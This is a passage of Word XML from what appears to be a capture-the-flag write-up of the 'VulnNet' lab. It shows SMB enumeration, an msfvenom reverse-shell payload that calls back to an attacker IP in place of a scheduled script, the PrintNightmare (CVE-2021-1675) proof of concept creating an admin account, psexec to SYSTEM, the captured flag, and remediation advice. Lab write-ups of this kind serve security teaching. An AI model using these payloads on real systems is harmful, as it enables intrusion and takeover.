                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VULNNET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="4757EF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3FD1" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Time to Crack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2E9B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="139BA44D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FACB9A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461C48A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6 — SMB Enumeration &amp; Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDA3B2" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>SMB Share Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DBB07" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the obtained credentials, SMB shares were enumerated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CF3CE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crackmapexec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smb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10.49.155.183 -u "enterprise-security" -p "sand_0873959498" --shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61EDD8" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36EE404D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The Enterprise-Share contained a PowerShell script PurgeIrrelevantData_1826.ps1 executed every ~30 seconds by the Windows task scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2592BA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557AD1B8" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Generation &amp; Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC6C43" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A malicious PowerShell reverse shell was generated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and uploaded to replace the legitimate scheduled script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462402D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msfvenom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-p windows/x64/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powershell_reverse_tcp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LHOST=10.49.107.122 LPORT=4444 -f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psh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-o PurgeIrrelevantData_1826.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844BF29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smbclient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//10.49.155.183/Enterprise-Share -U "enterprise-security%sand_0873959498" -c "put PurgeIrrelevantData_1826.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066664E" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336F9315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52B55B2" wp14:editId="3A834BF8">
            <wp:extent cx="7829550" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="461395352" name="Picture 46139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0D0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9 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload created as PurgeIrrelevantData_1826.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB20A4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F100EB1" w14:textId="77777777" w:rsidR="00C8729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A063110" wp14:editId="3A950B61">
            <wp:extent cx="7858125" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1897541546" name="Picture 189754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7159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10 — Reverse shell received as enterprise-security via Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD91D08" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B6A24" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 7 — Privilege Escalation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D639D53" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2021-1675 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) is a critical vulnerability in the Windows Print Spooler service that allows any authenticated user to load a malicious printer driver — executed as NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51976679" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>calebstewart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PowerShell PoC was downloaded and uploaded to the SMB share:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38430A52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https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -O PrintNightmare.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEFC7DF" w14:textId="77777777" w:rsidR="00C87297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smbclient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//10.49.155.183/Enterprise-Share -U "enterprise-security%sand_0873959498" -c "put PrintNightmare.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3BF48" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095DFE02" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Executed from the PowerShell reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E645D3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cd C:\Enterprise-Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11AB36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Import-Module .\PrintNightmare.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1FE53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Invoke-Nightmare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E68979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net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534C033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net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localgroup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administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE24D1" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509739EB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2E2568B" wp14:editId="401EBEDB">
            <wp:extent cx="7781925" cy="4200525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="990594428" name="Picture 99059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DDF6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11 — Shell as enterprise-security, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> module being loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14710E4C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503E2A9D" w14:textId="77777777" w:rsidR="00C8729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68C9F6A" wp14:editId="0BCC9DC5">
            <wp:extent cx="8172450" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1851270044" name="Picture 185127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9AEE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12 — Invoke-Nightmare creates adm1n as local administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18458AC2" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE8F657" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A new user adm1n (password: P@ssw0rd) was created and added to the local Administrators, Domain Admins, and Enterprise Admins groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F347C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CD3A76" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8 — SYSTEM Shell &amp; Final Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D488A4D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> psexec.py, a SYSTEM-level shell was obtained with the newly created adm1n account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE5FC1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psexec.py adm1n@10.49.155.183</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC0FEF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Password: P@ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C0CBB" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6148A9" w14:textId="77777777" w:rsidR="00C87297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3CD5693" wp14:editId="377F0E3C">
            <wp:extent cx="7448550" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91047926" name="Picture 91047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565B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13 — psexec.py connects and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirms </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556CE88" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3DF96B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The final flag was retrieved from the Administrator desktop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9658AF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type C:\users\administrator\desktop\system.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5111C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFE295A" w14:textId="77777777" w:rsidR="00C87297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051DC8E" wp14:editId="7F86F55F">
            <wp:extent cx="7877175" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1159257049" name="Picture 1159257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1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4CA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000"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>Figure 14 — system.txt flag captured as NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A471414" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C8729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297" w14:paraId="15613B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DA3647" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">system.txt  </w:t>
            </w:r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THM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97D"/>
              </w:rPr>
              <w:t>{d540c0645975900e5bb9167aa431fc9b}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E22517C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CE900" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability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000"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C87297" w14:paraId="6D3496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36E81" w14:textId="77777777" w:rsidR="00C8729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32BF8" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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AB284" w14:textId="77777777" w:rsidR="00C87297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F61AC" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE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2D6BB" w14:textId="77777777" w:rsidR="00C87297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C87297" w14:paraId="4D7658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33AB" w14:textId="77777777" w:rsidR="00C8729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D473" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unauthenticated Redis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03BDC" w14:textId="77777777" w:rsidR="00C87297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538F7" w14:textId="77777777" w:rsidR="00C87297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757F7" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>File read, cred theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="33842C8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E0210" w14:textId="77777777" w:rsidR="00C8729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1F84E" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Redis Lua Sandbox Escape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8FAC" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000"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769F6" w14:textId="77777777" w:rsidR="00C87297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8F037" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Arbitrary file read</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="57FDC3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DC408" w14:textId="77777777" w:rsidR="00C87297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66A8E" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTLM Hash Capture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2A8F9" w14:textId="77777777" w:rsidR="00C87297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914B4" w14:textId="77777777" w:rsidR="00C87297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BF25D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="045F5D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D6FE" w14:textId="77777777" w:rsidR="00C8729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6A3FD" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak Password Policy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E1953" w14:textId="77777777" w:rsidR="00C87297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34BB" w14:textId="77777777" w:rsidR="00C87297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D0E3" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cracked in 8 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="499E8C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4D433" w14:textId="77777777" w:rsidR="00C87297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91F4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PrintNightmare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PrivEsc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506EC" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs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757F0" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2021-1675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5619D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SYSTEM access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62750A91" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23438D" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3611F" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Secure Redis Immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11C77E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requirepass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with a strong password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711EEF75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Bind Redis to localhost only: bind 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD54EAB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Block port 6379 at the firewall from all external access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437D700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Disable the eval command if Lua scripting is not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4015E3" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9454BF" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Prevent NTLM Hash Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83EE77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Block outbound SMB (port 445) at the perimeter firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F602537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Enable SMB signing on all domain machines (already configured here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680B4F4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Consider disabling NTLMv1/v2 in favour of Kerberos-only authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAC5CA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C72A55C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Enforce Strong Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E7F22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Minimum 15-character passwords with complexity requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0047B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account lockout after failed attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8C750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Use a password manager and prohibit dictionary-based passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29631FBB" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC51057" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Patch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5510B76A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Apply Microsoft security update KB5004945 immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59473A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Disable the Print Spooler service on systems that do not require printing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E8796" w14:textId="77777777" w:rsidR="00C87297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Stop-Service -Name Spooler -Force; Set-Service -Name Spooler -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StartupType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Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797467B8" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BC0312" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>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87297" w14:paraId="6ABC7A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7B85" w14:textId="77777777" w:rsidR="00C87297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56B7" w14:textId="77777777" w:rsidR="00C8729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87297" w14:paraId="5D9395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00EB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2404" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full port scan and service/version detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="60ADA9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C0E8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-cli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446C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Redis enumeration and Lua exploit execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="07B00B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8CB9" w14:textId="77777777" w:rsidR="00C8729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Responder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4CF4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NTLM hash capture via fake SMB server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="729A4B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7083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Hashcat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06CB" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offline NTLMv2 password cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="3622A2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97B5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crackmapexec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D199" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SMB share enumeration and credential validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="1ECA6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2497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smbclient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9A76" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SMB file upload/download operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="290E80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F177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msfvenom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44E9" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse shell payload generation</w:t>
            </w:r>
          </w:p>
